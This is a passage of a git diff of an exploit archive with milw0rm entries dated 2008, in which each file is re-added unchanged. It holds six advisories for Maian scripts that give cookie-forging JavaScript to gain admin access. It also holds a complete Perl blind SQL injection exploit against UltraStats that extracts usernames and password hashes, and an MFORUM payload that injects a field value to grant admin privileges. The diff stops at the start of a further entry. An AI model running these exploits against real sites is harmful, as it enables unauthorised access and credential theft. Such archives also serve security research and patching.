+		$data    = explode("\r\n\r\n", $content);
+		$headers = array_shift($data);
+		$content = implode("\r\n\r\n", $data);
+		
+		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
+			$content = $this->unchunk($content);
+	
+		preg_match($this->regex, $content, $data);
+		
+		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
+		
+		return $data[1];
+	}
+	
+	/**
+	 * unchunk()
+	 * This function aims to remove chunked content sizes which
+	 * are putted by apache server when it uses chunked
+	 * transfert-encoding.
+	 */
+	function unchunk($data)
+	{
+		$dsize  = 1;
+		$offset = 0;
+		
+		while($dsize>0)
+		{
+			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
+			
+			$dsize = hexdec(substr($data, $offset, $hsize_size));
+			
+			# Remove $hsize\r\n from $data
+			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
+			
+			$offset += $dsize;
+			
+			# Remove the \r\n before the next $hsize
+			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
+		}
+		
+		return $data;
+	}
+}
+
+?>
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6061.txt b/platforms/php/webapps/6061.txt
index b8b7e83cd..516aae286 100755
--- a/platforms/php/webapps/6061.txt
+++ b/platforms/php/webapps/6061.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+          Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by Maian Guestbook v3.2
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
-   Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
-
-cookie exists.
-    and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
-    javascript:document.cookie = "gbook_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
-    after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+          Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+          Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by Maian Guestbook v3.2
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+   Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
+
+cookie exists.
+    and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+    javascript:document.cookie = "gbook_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+    after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+          Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6062.txt b/platforms/php/webapps/6062.txt
index 61edf3674..cb9c7af3a 100755
--- a/platforms/php/webapps/6062.txt
+++ b/platforms/php/webapps/6062.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+            Maian Links <= v3.1 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Links v3.1
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
-   Maian Links suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
-    and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
-    javascript:document.cookie = "links_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
-    after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+            Maian Links <= v3.1 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+            Maian Links <= v3.1 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Links v3.1
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+   Maian Links suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+    and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+    javascript:document.cookie = "links_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+    after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+            Maian Links <= v3.1 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6063.txt b/platforms/php/webapps/6063.txt
index 82628801a..ceaee91e3 100755
--- a/platforms/php/webapps/6063.txt
+++ b/platforms/php/webapps/6063.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+           Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Recipe v1.2
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
-   Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
-    and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
-    javascript:document.cookie = "recipe_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
-    after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+           Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+           Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Recipe v1.2
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+   Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+    and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+    javascript:document.cookie = "recipe_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+    after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+           Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6064.txt b/platforms/php/webapps/6064.txt
index 3829acc48..82d1f2ed3 100755
--- a/platforms/php/webapps/6064.txt
+++ b/platforms/php/webapps/6064.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+           Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by Maian Weblog v4.0
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
-   Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
-    and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
-    javascript:document.cookie = "weblog_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
-    after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+           Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+           Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by Maian Weblog v4.0
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+   Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+    and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+    javascript:document.cookie = "weblog_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+    after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+           Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6065.txt b/platforms/php/webapps/6065.txt
index ec36378cf..cd8e6f362 100755
--- a/platforms/php/webapps/6065.txt
+++ b/platforms/php/webapps/6065.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+         Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Uploader v4.0
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
-   Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
-    and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
-    javascript:document.cookie = "uploader_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
-    after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+         Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+         Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Uploader v4.0
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+   Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+    and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+    javascript:document.cookie = "uploader_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+    after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+         Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability          +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6066.txt b/platforms/php/webapps/6066.txt
index a8005d991..5c03ceee0 100755
--- a/platforms/php/webapps/6066.txt
+++ b/platforms/php/webapps/6066.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+          Maian Search <= v1.1 Insecure Cookie Handling Vulnerability           +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Search v1.1
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
-   Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
-    and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
-    javascript:document.cookie = "search_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
-    after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+          Maian Search <= v1.1 Insecure Cookie Handling Vulnerability           +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+          Maian Search <= v1.1 Insecure Cookie Handling Vulnerability           +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Search v1.1
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+   Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+    and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+    javascript:document.cookie = "search_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+    after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+          Maian Search <= v1.1 Insecure Cookie Handling Vulnerability           +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6067.pl b/platforms/php/webapps/6067.pl
index 7e745a6da..cc07c2bbe 100755
--- a/platforms/php/webapps/6067.pl
+++ b/platforms/php/webapps/6067.pl
@@ -1,226 +1,226 @@
-#!/usr/bin/perl
-use LWP::UserAgent;
-use Getopt::Long;
-
-#
-# [!] Discovered.: DNX
-# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org
-# [!] Detected...: 29.06.2008
-# [!] Reported...: 04.07.2008
-# [!] Response...: xx.xx.2008
-#
-# [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles. 
-#                  It is able to parse and consolidate the information it can gather from these logs, 
-#                  and put them into a MySQL Database with a very efficient and high optimiced database 
-#                  layout.
-#
-# [!] Bug........: $_GET['id'] in players-detail.php near line 52
-#                  
-#                  36: if ( isset($_GET['id']) )
-#                  37: {
-#                  38: 		// get and check
-#                  39: 		$content['playerguid'] = DB_RemoveBadChars($_GET['id']);
-#
-#                  52:     		$sqlquery = "SELECT " .
-#                  53:				"sum( " .STATS_ALIASES . ".Count) as Count, " .
-#                  54:				STATS_ALIASES . ".Alias as Aliases_Alias, " .
-#                  55:				STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" .
-#                  56:				" FROM " . STATS_ALIASES .
-#                  57:				" WHERE PLAYERID = " . $content['playerguid'] . " " .
-#                  58:				GetCustomServerWhereQuery(STATS_ALIASES, false) .
-#                  59:				" GROUP BY " . STATS_ALIASES . ".Alias " .
-#                  60:				" ORDER BY Count DESC";
-#
-# [!] Tested on..: v0.2.136, v0.2.142
-#
-# [!] Solution...: no update from vendor till now
-#
-# [!] Quick fix..: in players-detail.php line 39:
-#
-#                  - replace:
-#                      $content['playerguid'] = DB_RemoveBadChars($_GET['id']);
-#
-#                  - with:
-#                      $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id']));
-#
-
-if(!$ARGV[1])
-{
-  print "\n                                  \\#'#/                              ";
-  print "\n                                  (-.-)                               ";
-  print "\n   --------------------------oOO---(_)---OOo--------------------------";
-  print "\n   | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |";
-  print "\n   |                          coded by DNX                           |";
-  print "\n   ------------------------------------------------------------------";
-  print "\n[!] Usage: perl ultrastats.pl [Host] [Path] ";
-  print "\n[!] Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users";
-  print "\n[!] Options:";
-  print "\n       -o [no]       1 = username (default)";
-  print "\n                     2 = password";
-  print "\n                     3 = find database prefix (error based)";
-  print "\n       -i [no]       Valid GUID, default is 1";
-  print "\n       -l [no]       Limitation in sql query, -l 0 shows the first row,";
-  print "\n                     -l 1 the second one and so on, default is 0";
-  print "\n       -t [name]     Changed the user table name, default is stats_users";
-  print "\n       -p [ip:port]  Proxy support";
-  print "\n";
-  exit;
-}
-
-my $host    = $ARGV[0];
-my $path    = $ARGV[1];
-my $target  = "username";
-my $user    = 1;
-my $limit   = 0;
-my $table   = "stats_users";
-my %options = ();
-GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s");
-
-print "[!] Exploiting...\n";
-
-if($options{"i"})
-{
-  $user = $options{"i"};
-}
-
-if($options{"l"})
-{
-  $limit = $options{"l"};
-}
-
-if($options{"t"})
-{
-  $table = $options{"t"};
-}
-
-if($options{"o"} == 1)
-{
-  $target = "username";
-  get_username();
-}
-elsif($options{"o"} == 2)
-{
-  $target = "password";
-  get_password();
-}
-elsif($options{"o"} == 3)
-{
-  get_prefix();
-}
-
-sub get_username()
-{
-  syswrite(STDOUT, "[!] Username: ", 14);
-  for(my $i = 1; $i <= 32; $i++)
-  {
-    my $found = 0;
-    my $h = 48;
-    while(!$found && $h <= 57)
-    {
-      if(istrue2($host, $path, $table, $i, $h))
-      {
-        $found = 1;
-        syswrite(STDOUT, chr($h), 1);
-      }
-      $h++;
-    }
-    if(!$found)
-    {
-      $h = 64;
-      while(!$found && $h <= 122)
-      {
-        if(istrue2($host, $path, $table, $i, $h))
-        {
-          $found = 1;
-          syswrite(STDOUT, chr($h), 1);
-        }
-        $h++;
-      }
-    }
-  }  
-}
-
-sub get_password()
-{
-  syswrite(STDOUT, "[!] MD5-Hash: ", 14);
-  for(my $i = 1; $i <= 32; $i++)
-  {
-    my $found = 0;
-    my $h = 48;
-    while(!$found && $h <= 57)
-    {
-      if(istrue2($host, $path, $table, $i, $h))
-      {
-        $found = 1;
-        syswrite(STDOUT, chr($h), 1);
-      }
-      $h++;
-    }
-    if(!$found)
-    {
-      $h = 97;
-      while(!$found && $h <= 102)
-      {
-        if(istrue2($host, $path, $table, $i, $h))
-        {
-          $found = 1;
-          syswrite(STDOUT, chr($h), 1);
-        }
-        $h++;
-      }
-    }
-  }
-}
-
-sub get_prefix()
-{
-  my $ua = LWP::UserAgent->new;
-  my $url = "http://".$host.$path."players-detail.php?id=".$user."'";
-  
-  if($options{"p"})
-  {
-    $ua->proxy('http', "http://".$options{"p"});
-  }
-  
-  my $response = $ua->get($url);
-  my $content = $response->content;
-  
-  $content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/;
-  print "[!] Prefix: ".$1;
-}
-
-print "\n[!] Exploit done\n";
-
-sub istrue2
-{
-  my $host  = shift;
-  my $path  = shift;
-  my $table = shift;
-  my $i     = shift;
-  my $h     = shift;
-  
-  my $ua = LWP::UserAgent->new;
-  my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")";
-  
-  if($options{"p"})
-  {
-    $ua->proxy('http', "http://".$options{"p"});
-  }
-  
-  my $response = $ua->get($url);
-  my $content = $response->content;
-  
-  my $regexp = "Top Hitlocations where you got killed by others";
-  my $regexp2 = "Meist genutzte Aliases";
-  
-  if($content =~ /$regexp/ || $content =~ /$regexp2/)
-  {
-    return 1;
-  }
-  else
-  {
-    return 0;
-  }
-}
-
-# milw0rm.com [2008-07-13]
+#!/usr/bin/perl
+use LWP::UserAgent;
+use Getopt::Long;
+
+#
+# [!] Discovered.: DNX
+# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org
+# [!] Detected...: 29.06.2008
+# [!] Reported...: 04.07.2008
+# [!] Response...: xx.xx.2008
+#
+# [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles. 
+#                  It is able to parse and consolidate the information it can gather from these logs, 
+#                  and put them into a MySQL Database with a very efficient and high optimiced database 
+#                  layout.
+#
+# [!] Bug........: $_GET['id'] in players-detail.php near line 52
+#                  
+#                  36: if ( isset($_GET['id']) )
+#                  37: {
+#                  38: 		// get and check
+#                  39: 		$content['playerguid'] = DB_RemoveBadChars($_GET['id']);
+#
+#                  52:     		$sqlquery = "SELECT " .
+#                  53:				"sum( " .STATS_ALIASES . ".Count) as Count, " .
+#                  54:				STATS_ALIASES . ".Alias as Aliases_Alias, " .
+#                  55:				STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" .
+#                  56:				" FROM " . STATS_ALIASES .
+#                  57:				" WHERE PLAYERID = " . $content['playerguid'] . " " .
+#                  58:				GetCustomServerWhereQuery(STATS_ALIASES, false) .
+#                  59:				" GROUP BY " . STATS_ALIASES . ".Alias " .
+#                  60:				" ORDER BY Count DESC";
+#
+# [!] Tested on..: v0.2.136, v0.2.142
+#
+# [!] Solution...: no update from vendor till now
+#
+# [!] Quick fix..: in players-detail.php line 39:
+#
+#                  - replace:
+#                      $content['playerguid'] = DB_RemoveBadChars($_GET['id']);
+#
+#                  - with:
+#                      $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id']));
+#
+
+if(!$ARGV[1])
+{
+  print "\n                                  \\#'#/                              ";
+  print "\n                                  (-.-)                               ";
+  print "\n   --------------------------oOO---(_)---OOo--------------------------";
+  print "\n   | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |";
+  print "\n   |                          coded by DNX                           |";
+  print "\n   ------------------------------------------------------------------";
+  print "\n[!] Usage: perl ultrastats.pl [Host] [Path] ";
+  print "\n[!] Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users";
+  print "\n[!] Options:";
+  print "\n       -o [no]       1 = username (default)";
+  print "\n                     2 = password";
+  print "\n                     3 = find database prefix (error based)";
+  print "\n       -i [no]       Valid GUID, default is 1";
+  print "\n       -l [no]       Limitation in sql query, -l 0 shows the first row,";
+  print "\n                     -l 1 the second one and so on, default is 0";
+  print "\n       -t [name]     Changed the user table name, default is stats_users";
+  print "\n       -p [ip:port]  Proxy support";
+  print "\n";
+  exit;
+}
+
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $target  = "username";
+my $user    = 1;
+my $limit   = 0;
+my $table   = "stats_users";
+my %options = ();
+GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s");
+
+print "[!] Exploiting...\n";
+
+if($options{"i"})
+{
+  $user = $options{"i"};
+}
+
+if($options{"l"})
+{
+  $limit = $options{"l"};
+}
+
+if($options{"t"})
+{
+  $table = $options{"t"};
+}
+
+if($options{"o"} == 1)
+{
+  $target = "username";
+  get_username();
+}
+elsif($options{"o"} == 2)
+{
+  $target = "password";
+  get_password();
+}
+elsif($options{"o"} == 3)
+{
+  get_prefix();
+}
+
+sub get_username()
+{
+  syswrite(STDOUT, "[!] Username: ", 14);
+  for(my $i = 1; $i <= 32; $i++)
+  {
+    my $found = 0;
+    my $h = 48;
+    while(!$found && $h <= 57)
+    {
+      if(istrue2($host, $path, $table, $i, $h))
+      {
+        $found = 1;
+        syswrite(STDOUT, chr($h), 1);
+      }
+      $h++;
+    }
+    if(!$found)
+    {
+      $h = 64;
+      while(!$found && $h <= 122)
+      {
+        if(istrue2($host, $path, $table, $i, $h))
+        {
+          $found = 1;
+          syswrite(STDOUT, chr($h), 1);
+        }
+        $h++;
+      }
+    }
+  }  
+}
+
+sub get_password()
+{
+  syswrite(STDOUT, "[!] MD5-Hash: ", 14);
+  for(my $i = 1; $i <= 32; $i++)
+  {
+    my $found = 0;
+    my $h = 48;
+    while(!$found && $h <= 57)
+    {
+      if(istrue2($host, $path, $table, $i, $h))
+      {
+        $found = 1;
+        syswrite(STDOUT, chr($h), 1);
+      }
+      $h++;
+    }
+    if(!$found)
+    {
+      $h = 97;
+      while(!$found && $h <= 102)
+      {
+        if(istrue2($host, $path, $table, $i, $h))
+        {
+          $found = 1;
+          syswrite(STDOUT, chr($h), 1);
+        }
+        $h++;
+      }
+    }
+  }
+}
+
+sub get_prefix()
+{
+  my $ua = LWP::UserAgent->new;
+  my $url = "http://".$host.$path."players-detail.php?id=".$user."'";
+  
+  if($options{"p"})
+  {
+    $ua->proxy('http', "http://".$options{"p"});
+  }
+  
+  my $response = $ua->get($url);
+  my $content = $response->content;
+  
+  $content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/;
+  print "[!] Prefix: ".$1;
+}
+
+print "\n[!] Exploit done\n";
+
+sub istrue2
+{
+  my $host  = shift;
+  my $path  = shift;
+  my $table = shift;
+  my $i     = shift;
+  my $h     = shift;
+  
+  my $ua = LWP::UserAgent->new;
+  my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")";
+  
+  if($options{"p"})
+  {
+    $ua->proxy('http', "http://".$options{"p"});
+  }
+  
+  my $response = $ua->get($url);
+  my $content = $response->content;
+  
+  my $regexp = "Top Hitlocations where you got killed by others";
+  my $regexp2 = "Meist genutzte Aliases";
+  
+  if($content =~ /$regexp/ || $content =~ /$regexp2/)
+  {
+    return 1;
+  }
+  else
+  {
+    return 0;
+  }
+}
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6068.txt b/platforms/php/webapps/6068.txt
index a463c75b1..5a157dd30 100755
--- a/platforms/php/webapps/6068.txt
+++ b/platforms/php/webapps/6068.txt
@@ -1,60 +1,60 @@
-=================================================
-  MFORUM 0.1a Arbitrary Add-Admin Vulnerability
-=================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 13 July 2008
-SITE   : cwh.citec.us
-
-
-###################################################################################
-APPLICATION : MFORUM
-VERSION     : 0.1a
-DOWNLOAD    : http://downloads.sourceforge.net/marcioforum/mforum.zip
-###################################################################################
-
-
---- Add-Admin Exploit ---
-
-***magic_quotes_gpc = off***
-
--------------
- Description
--------------
-
-    MFORUM 0.1a has Vulnerability to escalate user's privilege to administartor's privilege.
-That Vulnerable in "Control Panel - Edit your profile" (http://[Target]/[mforum_path]/usercp.php?mode=edit_profile)
-and you can injection code into various field (City, Interest, Email, Icq, msn, Yahoo Messenger).
-
-    This action will give your account can use Admin Control Panel (http://[Target]/[mforum_path]/admin/index.php)
-with Administrative's Privilege.
-
------------------
- Vulnerable Path
------------------
-[+] http://[target]/[mforum_path]/usercp.php?mode=edit_profile
-
---------------
- Exploit code
---------------
-[+] hacked", type="2
-
-
-#####################################################################
- Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
- Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-07-13]
+=================================================
+  MFORUM 0.1a Arbitrary Add-Admin Vulnerability
+=================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 13 July 2008
+SITE   : cwh.citec.us
+
+
+###################################################################################
+APPLICATION : MFORUM
+VERSION     : 0.1a
+DOWNLOAD    : http://downloads.sourceforge.net/marcioforum/mforum.zip
+###################################################################################
+
+
+--- Add-Admin Exploit ---
+
+***magic_quotes_gpc = off***
+
+-------------
+ Description
+-------------
+
+    MFORUM 0.1a has Vulnerability to escalate user's privilege to administartor's privilege.
+That Vulnerable in "Control Panel - Edit your profile" (http://[Target]/[mforum_path]/usercp.php?mode=edit_profile)
+and you can injection code into various field (City, Interest, Email, Icq, msn, Yahoo Messenger).
+
+    This action will give your account can use Admin Control Panel (http://[Target]/[mforum_path]/admin/index.php)
+with Administrative's Privilege.
+
+-----------------
+ Vulnerable Path
+-----------------
+[+] http://[target]/[mforum_path]/usercp.php?mode=edit_profile
+
+--------------
+ Exploit code
+--------------
+[+] hacked", type="2
+
+
+#####################################################################
+ Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+ Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6069.txt b/platforms/php/webapps/6069.txt
index 4605ec132..ebd566f58 100755
--- a/platforms/php/webapps/6069.txt
+++ b/platforms/php/webapps/6069.txt
@@ -1,56 +1,56 @@
-######## ##    ##  ######  ########  ##    ## ########  ########  #######  ######## 
